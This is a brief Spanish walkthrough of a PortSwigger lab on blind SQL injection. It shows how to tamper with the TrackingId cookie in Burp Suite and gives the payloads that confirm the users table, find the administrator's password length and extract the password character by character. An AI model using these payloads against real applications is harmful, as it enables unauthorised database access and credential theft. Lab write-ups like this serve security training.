
[Laboratorio](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses)

Para la primera inyección usaremos Burp Suite para interceptar la cookie de la página y cambiamos el trackingId al siguiente código `TrackingId=xyz' AND '1'='1 TrackingId=xyz' AND '1'='2` con esto podemos observar el funcionamiento de los booleanos. Posteriormente tendriamos que mirar en la tabla los elementos que existen para ello usamos `' AND (SELECT 'a' FROM users LIMIT 1)='a` que básicamente comprueba si hay una tabla users mediante la existencia de Welcome back! posteriormente tendriamos que mirar la existencia de un administrador mediante el código `' AND (SELECT 'a' FROM users where username = 'administrator')='a` Luego miraremos el tamaño de la cadena password mediante el código `' AND (SELECT 'a' FROM users WHERE username = 'administrator' AND LENGTH(password)>1)='a` así haciendo mayor o menor hasta obtener la longitud finalmente pasamos a obtener la contraseña para ello usamos la herramienta intruder de Burp Suite junto con el codigo `' AND (SELECT SUBSTRING(password,pos,1) FROM users WHERE username='administrator')='1` mediante este codigo vamos sacando los valores de la contraseña hasta conseguir la contraseña.